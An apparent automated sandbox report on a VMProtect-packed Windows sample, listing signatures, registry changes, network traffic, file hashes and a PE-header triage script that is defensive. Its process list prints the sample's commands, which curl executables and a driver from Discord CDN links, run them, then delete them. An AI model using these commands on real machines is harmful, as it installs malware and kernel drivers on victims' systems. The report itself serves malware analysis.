Analysis Overview
SHA256
3b0cf0a25f13296540bfcc2e891958adc7c8c7aa799cf4cc1988d79299f6c1c4
Threat Level: Shows suspicious behavior
The submitted file 84dfe3e2c2c23431bf1016ea20d6c329 was found to show suspicious behavior.
Malicious Activity Summary
VMProtect packed file
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Modifies registry class
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-22 10:27
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
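The two static1 signatures above, "VMProtect packed file" and "Unsigned PE", are both answered from the PE headers alone. The following Python is an added example (not the sandbox's code, and not derived from the analysed file) showing how each check is made: VMProtect is flagged by its default section names (.vmp0, .vmp1, ...) and by near-8-bit-per-byte section entropy, and "unsigned" means the Authenticode security data directory (index 4) is empty. The PE it inspects is a minimal PE32+ image constructed inline for the demonstration; the 7.0 bits/byte entropy threshold is a common triage cut-off chosen for this example, not a value taken from the report.

```python
"""Static checks behind the static1 signatures 'VMProtect packed file' and
'Unsigned PE'. Added example, not the sandbox's code. SAMPLE_PE is a constructed
PE32+ image built below, not the analysed file."""
import hashlib
import math
import struct
from collections import Counter

IMAGE_DIRECTORY_ENTRY_SECURITY = 4  # Authenticode signature directory
VMP_SECTION_PREFIX = ".vmp"         # VMProtect's default section names: .vmp0, .vmp1, ...
HIGH_ENTROPY = 7.0                  # bits/byte; compressed or encrypted data sits near 8

def entropy(data):
    """Shannon entropy of a byte string in bits per byte."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def parse_pe32plus(blob):
    """Read the COFF header, data directories and section table of a 64-bit PE."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", blob, 0x3C)[0]          # e_lfanew
    if blob[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, pe + 4)
    opt = pe + 24                                          # optional header follows COFF
    if struct.unpack_from("<H", blob, opt)[0] != 0x20B:
        raise ValueError("only PE32+ is handled in this example")
    ndirs = struct.unpack_from("<I", blob, opt + 108)[0]   # NumberOfRvaAndSizes (PE32+)
    dirs = [struct.unpack_from("<II", blob, opt + 112 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        name, _, _, rawsize, rawptr = struct.unpack_from("<8sIIII", blob, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(),
                         "entropy": entropy(blob[rawptr:rawptr + rawsize])})
    return {"dirs": dirs, "sections": sections}

def is_unsigned(pe):
    """True when no embedded Authenticode blob exists (catalog signing is not covered)."""
    dirs = pe["dirs"]
    return len(dirs) <= IMAGE_DIRECTORY_ENTRY_SECURITY or dirs[IMAGE_DIRECTORY_ENTRY_SECURITY][1] == 0

def vmprotect_indicators(pe):
    """Section-name and entropy evidence of VMProtect-style packing."""
    hits = []
    for s in pe["sections"]:
        if s["name"].startswith(VMP_SECTION_PREFIX):
            hits.append(f"{s['name']}: VMProtect section name")
        if s["entropy"] > HIGH_ENTROPY:
            hits.append(f"{s['name']}: entropy {s['entropy']:.2f}")
    return hits

def build_pe32plus(section_blobs):
    """Construct a minimal, non-runnable PE32+ with the given sections and no signature."""
    nsec, opt_size, align = len(section_blobs), 240, 0x200
    hdr_len = -(-(0x40 + 24 + opt_size + 40 * nsec) // align) * align
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, nsec, 0, 0, 0, opt_size, 0x22)
    opt = struct.pack("<H", 0x20B) + b"\0" * 106 + struct.pack("<I", 16) + b"\0" * 128
    table, body, rawptr, va = b"", b"", hdr_len, 0x1000
    for name, data in section_blobs:
        padded = data + b"\0" * (-len(data) % align)
        table += struct.pack("<8sIIII", name, len(data), va, len(padded), rawptr) + b"\0" * 16
        body += padded
        rawptr += len(padded)
        va += -(-len(padded) // 0x1000) * 0x1000
    head = dos + b"PE\0\0" + coff + opt + table
    return head + b"\0" * (hdr_len - len(head)) + body

# Constructed sample: a plain code section plus two VMProtect-named sections, one of
# them filled with pseudo-random (high-entropy) bytes derived from SHA-256 digests.
RANDOMISH = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(256))
SAMPLE_PE = build_pe32plus([(b".text", b"\x90" * 1024 + b"\xc3"),
                            (b".vmp0", RANDOMISH),
                            (b".vmp1", b"\0" * 512)])

def triage(blob):
    pe = parse_pe32plus(blob)
    return {"unsigned_pe": is_unsigned(pe),
            "sections": [s["name"] for s in pe["sections"]],
            "vmprotect": vmprotect_indicators(pe)}

if __name__ == "__main__":
    for key, value in triage(SAMPLE_PE).items():
        print(key, value)
```

An empty security directory only rules out an embedded Authenticode signature; a catalog-signed binary is reported as unsigned by this check too, so confirm with signtool or Get-AuthenticodeSignature on a real system before acting on the result.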
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-22 10:27
Reported
2023-12-23 14:01
Platform
win7-20231215-en
Max time kernel
117s
Max time network
157s
Command Line
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 505abb4ea835da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\DOMStorage\discord.com | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "409501808" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{67022A31-A19B-11EE-BB33-CEEF1DCBEAFA} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\DOMStorage | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\DOMStorage\discord.com\NumberOfSubdomains = "1" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a883829c536588438b4279b7bc6c193000000000020000000000106600000001000020000000f351b51b4938c4ac1a099859c05beea91d6921ed4af44c7241f66a6426c2ef3d000000000e8000000002000020000000a96f5b046adc3fc20b6fd7c83db3b6dc5d1b4a99ff6b5523eea8701ebb3a62a620000000e1cb6549bd6758f5c98953bcf1b43f83f3d080137c78f768d4e4ffbb0a4124c640000000585fc869947fb830797ead543b73ef6690ebdf05dc5829b63315ab35ce1c51b4f83e3c72282f2e3a512abe281cc6426de61682aa2d8cf43c706ec3e67c79d1fe | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe
"C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Color C
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start https://discord.gg/7fhtVRZEC6
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://discord.gg/7fhtVRZEC6
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920268165275648/Monke.exe --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920352911163392/CongratsYouCrackedAUnprotectedInjector.sys --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2992 CREDAT:275457 /prefetch:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Monke.exe C:\Windows\GigaByteTech.sys >nul 2>&1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | discord.gg | udp |
| US | 162.159.133.234:443 | discord.gg | tcp |
| US | 162.159.133.234:443 | discord.gg | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/1200-0-0x0000000077970000-0x0000000077972000-memory.dmp
memory/1200-2-0x000000013FD10000-0x0000000140669000-memory.dmp
memory/1200-3-0x0000000077970000-0x0000000077972000-memory.dmp
memory/1200-5-0x0000000077970000-0x0000000077972000-memory.dmp
memory/1200-7-0x00000000777C0000-0x0000000077969000-memory.dmp
memory/1200-6-0x000000013FD10000-0x0000000140669000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab8E7C.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar9062.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fb79b0c6031801495ec88c53591873c8 |
| SHA1 | 6da8d4be344df080f369b673d8dc531038e748fb |
| SHA256 | 40df25f6cd9b62f61422770cf9398a56694b55b3578b9a1f383e58be2d1828e4 |
| SHA512 | 4548c39f3934152c8b0065d1e498badc4b80dc8ea80d3e55be0d6e35fd48bfb2426d9156ac9c8217d44c1fd74a2682b4fc92964683441bcfcb96937cdc501331 |
memory/1200-418-0x000000013FD10000-0x0000000140669000-memory.dmp
memory/1200-421-0x00000000777C0000-0x0000000077969000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6MCRSFJ\favicon[1].ico
| MD5 | ec2c34cadd4b5f4594415127380a85e6 |
| SHA1 | e7e129270da0153510ef04a148d08702b980b679 |
| SHA256 | 128e20b3b15c65dd470cb9d0dc8fe10e2ff9f72fac99ee621b01a391ef6b81c7 |
| SHA512 | c1997779ff5d0f74a7fbb359606dab83439c143fbdb52025495bdc3a7cb87188085eaf12cc434cbf63b3f8da5417c8a03f2e64f751c0a63508e4412ea4e7425c |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\d151rer\imagestore.dat
| MD5 | f23309bb5938b31f8df75c4023711cc4 |
| SHA1 | 47d31f46c196841a7dfb6a0fe6ea1fa7de2c8677 |
| SHA256 | 5e8aa83d7ba1f7ceb1fa5f8cd09fd750f6dcf75e209a66508adf103784fd1b0b |
| SHA512 | fa7c6145dfa6591f7376ce5ad51415ff64375120eb606c423d94eaf4ea492b2c66fd48e6050fcd400c6b9043b130ab0cea6a915fab1702f0bf84ebc49c5bd8f0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0c4e04e7eb975d25ae2fd723bd9d0211 |
| SHA1 | 576c83769f560a738e7f29d3686cb8cb505b6d49 |
| SHA256 | 42b740597a693b112b33a0baaa768f5e99fef8b10af542077ed3699554cc0619 |
| SHA512 | 28b372079a1ea00e136419974970f027a81e497c0441c995a1b40607df4c6e6217dbba32d946f73b437a3fa2999cf38c82344d2b42db48943e258071b45c7d59 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a531d6c5abe413f63819c0ca1dbeeb64 |
| SHA1 | e56f0b975c10700d18a47935281ebf8c4112ee74 |
| SHA256 | f2d30a99f1849894053e1ad2b562dd93b2090912e3dda94604b57d32ea5ae15d |
| SHA512 | 1dddb37c810c6238114e49ccff241468524d9dfdc4c2d5129a2990c1978cf6576c33e9fa2cd12602d76f632400852952b19a177768d2fb8a28744b19e8d49954 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bf6c4591251babaf17a09f05af4fdbaf |
| SHA1 | 02b5993293fa2b116e5e04c318e0397985dcfb42 |
| SHA256 | 481753b4d04fba059b38a73bc5981f0249d38f41eb7f4c6959e17b92d27665df |
| SHA512 | 8b79baa029f2dc58d38b4be6e71d464405ca1e2ca42387ec71840a2214fda6dba91b3c538a696905b12f44dbbc79d454e47dbb786dedc235b3d136bf084a2453 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bc7582e7c5ae1f6fba217bc3cf8f79e6 |
| SHA1 | e5ade1e265369a23a8f03f5f77cd1e6040ca23b8 |
| SHA256 | c0b0ca00303aa9fd01770644db131aceaa39b764da2127f6ef95578c61f8f46e |
| SHA512 | 3d82d50511eb4ccad7a19600999764985df77a777da02f1557285424632bd24248614e0d8ac3a7aa1eb480da290fea60bf73a7f393d34c7fb46359e6997ab6dc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a838aa441ec111781dd602eccdf285a3 |
| SHA1 | 8c4cca2ed8ad2d27fc5b25182e10f6c1997bb0e9 |
| SHA256 | 3332bdf808b6654a3f9f6f70ac3e73315f513b931d92c775230429da02167b68 |
| SHA512 | 945c32bebbb03ff631537247cb2714336f662c139db60d99856c2345f26e7157e4f74b3037e7ce661863b79a28481f6ac263f6ee1e22d0f609ab402ca0263d36 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 70bf6a1197fbe7c474e07f16edeb7aed |
| SHA1 | c81ab279a9136e578331082bc0e2d8e128dce01a |
| SHA256 | 48111d52ebf0dd03a893d92d6669c36232028eb81fa96ee1a2e80a3841122c84 |
| SHA512 | de2478e7d5dad55edc81f834be457e89d52310015c6e408cfbf2f7961346e78aa58f29df41a87131d8bae111303eed3c692def73a7d2dd672a25c4b934b21200 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2b78d4344c880e31eb612c356d516cab |
| SHA1 | 1739acdcc32d9c033620a2e68361396cd50512b3 |
| SHA256 | 7cef8cb87fc2f18150fe3de915b7eb2106dde2f79f8c4809ea0fe1993d3700b6 |
| SHA512 | a355c8dd11e57361bb6dfbbce0b450a6e8b1d4f306e106ae08391472e9f5f5b0368fd43db4d536e05a0956f7d8a32bb692efa394763c91de600794540cf663e9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6af8a20603ba345c39db33c665b7cee7 |
| SHA1 | ffaa471abe8b1c0aa1227d0be8b415e29b3f8f61 |
| SHA256 | 4597f49784f58d7495362702280a906242af5d7a0c7c7a28ea208772ff7b3b38 |
| SHA512 | a39bf9dd247973844372d7512f685a6662745416ec0f3ec4432ed81aebffde2507a75d3c7f17649c70028d6b30c432b733d255aa56706411f8ea5de76003f36f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 40b4b1762c66bdba356c11f643e4fcc0 |
| SHA1 | 325b643d63117cd147a2ac4b41639ca673def7fe |
| SHA256 | dd274fa908e1aa7c334d642504de653d69e102fe04a07e3907615cb8a40724e0 |
| SHA512 | dc692c8ef51547aa25d578223ae798c4349cae6208630450a6da4d5834d7d3947293620982821b0ef7e02bd7b4c4004d31f11facfd9a3564a385133eb9812452 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6ed7ce9cf4736b39cf2c798d9c277f94 |
| SHA1 | a0cbd403e798451ce5aa004c92966a1c2ff551a8 |
| SHA256 | 4e922dd1d8926adf719fb33586578736f3049bb8d4e613b66e4c39bb2d5f4a34 |
| SHA512 | 6e46157c8124324fcb88df04947c89784142afe3e5eb1d97853f5478e4850efa40fb7d68ad66ac0563899919f9b571f44f68db1a11fb8753590b68dc7da1f269 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c531922e68b5732f7e4cff3c346afd1b |
| SHA1 | 0284ed565f234f43ee14276720d0f13555866422 |
| SHA256 | 440009c51f99b16af1be2e7f6b038e21193794d8f151cedf9116692ff47cfa1f |
| SHA512 | 884dbc1c28acac51282a61bc39e5948cdf5b132dfa721edc68e58d582d9e5383575110fb81692655b933c0548acc3dcdc881406abc3fd6132db6e1b7e43d0fca |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e96a82ad354158cf3fbc1841e7ec450e |
| SHA1 | 8cc0022a4914cda1ebccd04fd9b34fc49c2cfacc |
| SHA256 | 47c6f28ce09bbe7fcae3fcfe79f4acee02093350a2aec5741bc035855fd7a854 |
| SHA512 | c89836f78e8bae31b08a017cffa0d47a37e5689eb985f5c2ccfdba0d7a3b6d34275fd4550e40e4f9f70c8db96405bd1023df097ff89f47958cddc2f8b06ac6ab |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d32a1145fa24e278d5b879a253ceaf1b |
| SHA1 | 7fad5b4eda72e52568e5c35d736240880ff61573 |
| SHA256 | fbe19914ca42686b96b4a28efdc2aed8061cb39e6cca6206180556f5669013e9 |
| SHA512 | 88a5f0c8202d5ffa241b7b00d820ad49be8830723b27059f031c6d9f5429bad5eedcbba546644ed30432df9e619e8beb0b97fd723420068c0a67491f622d1d3e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8dea5297d7eabe918bac7cecf7891382 |
| SHA1 | 57775c9efa3da6f9f6a1c66243655d8642863359 |
| SHA256 | e729135d7adfdb71ce3953ab89c5aee83a7801a22bb49a25377bfc6050f5c167 |
| SHA512 | 123c325c0264338f327e11f2fabc649032e1141ba9f0c37af10b7e31db65ab7ea61b2952d75c84abdbf43f694b7e5457353694caf0354064fc9448a825abc5be |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 083d06b1835da89231db9b894948b88a |
| SHA1 | b423b1298c9ba7e2205d7bc437256ffdb4cfc58e |
| SHA256 | 0eda52a83ea05ca6fd4e49a82f49bff856b59bda8d4f0991c63ffe790f5ae6eb |
| SHA512 | 1f2f1436ccf61d2ddf10ee279ee5802188cb4827e18a6725d96404953351b6398104106abd0bdc397e5a1c84b16ea868e8dd18436b19d995dabb0acabed36530 |
